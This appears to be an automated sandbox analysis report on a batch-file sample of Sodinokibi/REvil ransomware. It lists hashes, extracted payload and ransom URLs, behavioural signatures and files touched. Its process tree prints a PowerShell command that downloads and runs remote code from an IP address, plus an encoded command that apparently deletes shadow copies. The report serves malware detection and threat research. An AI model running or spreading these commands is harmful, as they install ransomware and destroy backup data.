Analysis
-
max time kernel
139s -
max time network
55s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
09-07-2020 08:10
Static task
static1
Behavioral task
behavioral1
Sample
8f9ff3aa474fa163cb2753cdce6a9abc.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
8f9ff3aa474fa163cb2753cdce6a9abc.bat
Resource
win10
General
-
Target
8f9ff3aa474fa163cb2753cdce6a9abc.bat
-
Size
214B
-
MD5
6583fe9275827519cd2bad15c56e349c
-
SHA1
134d9f2a3be2ede4777cd9216538f582570c21e5
-
SHA256
65aca88b78d41c561c3ab4b732484deb7ba50a7a3b9499406faf938ee12085b8
-
SHA512
c96021e32ec898f32c0de82016c899052d36358d1e57512c4b4b0875e1507a7862b5837cb4e5e98b2a5726a059a1593749b0839fac788db9c70bfcdd07dea48b
Malware Config
Extracted
http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc
Extracted
C:\70f99a3q4-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/7C7E8AD28D2AAA5B
http://decryptor.cc/7C7E8AD28D2AAA5B
Signatures
-
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1032 wrote to memory of 364 1032 cmd.exe powershell.exe PID 1032 wrote to memory of 364 1032 cmd.exe powershell.exe PID 1032 wrote to memory of 364 1032 cmd.exe powershell.exe PID 1032 wrote to memory of 364 1032 cmd.exe powershell.exe PID 364 wrote to memory of 1712 364 powershell.exe powershell.exe PID 364 wrote to memory of 1712 364 powershell.exe powershell.exe PID 364 wrote to memory of 1712 364 powershell.exe powershell.exe PID 364 wrote to memory of 1712 364 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 364 powershell.exe Token: SeDebugPrivilege 1712 powershell.exe Token: SeBackupPrivilege 1612 vssvc.exe Token: SeRestorePrivilege 1612 vssvc.exe Token: SeAuditPrivilege 1612 vssvc.exe Token: SeTakeOwnershipPrivilege 364 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 364 powershell.exe 364 powershell.exe 364 powershell.exe 1712 powershell.exe 1712 powershell.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 3 364 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ql78br.bmp" powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 364 powershell.exe -
Enumerates connected drives 3 TTPs
-
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe -
Drops file in Program Files directory 34 IoCs
Processes:
powershell.exedescription ioc process File created \??\c:\program files\microsoft sql server compact edition\70f99a3q4-readme.txt powershell.exe File opened for modification \??\c:\program files\PublishTest.shtml powershell.exe File opened for modification \??\c:\program files\RenameSwitch.ram powershell.exe File opened for modification \??\c:\program files\UnblockLock.xlt powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\70f99a3q4-readme.txt powershell.exe File opened for modification \??\c:\program files\GetEnable.temp powershell.exe File opened for modification \??\c:\program files\PingComplete.xlsb powershell.exe File opened for modification \??\c:\program files\ResolveDisconnect.js powershell.exe File opened for modification \??\c:\program files\RestoreGroup.raw powershell.exe File opened for modification \??\c:\program files\ResumeProtect.doc powershell.exe File opened for modification \??\c:\program files\ApprovePublish.mpeg3 powershell.exe File opened for modification \??\c:\program files\LimitUninstall.vbs powershell.exe File opened for modification \??\c:\program files\SendMount.xls powershell.exe File opened for modification \??\c:\program files\UpdateEnter.rle powershell.exe File opened for modification \??\c:\program files\SaveConvertFrom.au3 powershell.exe File opened for modification \??\c:\program files\TracePublish.gif powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\70f99a3q4-readme.txt powershell.exe File created \??\c:\program files\70f99a3q4-readme.txt powershell.exe File opened for modification \??\c:\program files\AddUpdate.wav powershell.exe File opened for modification \??\c:\program files\NewAdd.vsdx powershell.exe File opened for modification \??\c:\program files\ShowConvertTo.zip powershell.exe File created \??\c:\program files (x86)\70f99a3q4-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromJoin.doc powershell.exe File opened for modification \??\c:\program files\ConvertRequest.midi powershell.exe File opened for modification \??\c:\program files\DebugRename.xps powershell.exe File opened for modification \??\c:\program files\ExportProtect.ppsm powershell.exe File opened for modification \??\c:\program files\OptimizeStart.mid powershell.exe File opened for modification \??\c:\program files\InitializeInvoke.wvx powershell.exe File opened for modification \??\c:\program files\RevokePop.3gpp powershell.exe File opened for modification \??\c:\program files\StartPublish.dotm powershell.exe File opened for modification \??\c:\program files\StepShow.ppt powershell.exe File opened for modification \??\c:\program files\UnprotectUnblock.vssx powershell.exe File opened for modification \??\c:\program files\ConnectLimit.wma powershell.exe File opened for modification \??\c:\program files\RevokeShow.clr powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\8f9ff3aa474fa163cb2753cdce6a9abc.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/8f9ff3aa474fa163cb2753cdce6a9abc');Invoke-QAYURDA;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Sets desktop wallpaper using registry
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Drops file in Program Files directory
PID:364 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1712
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1612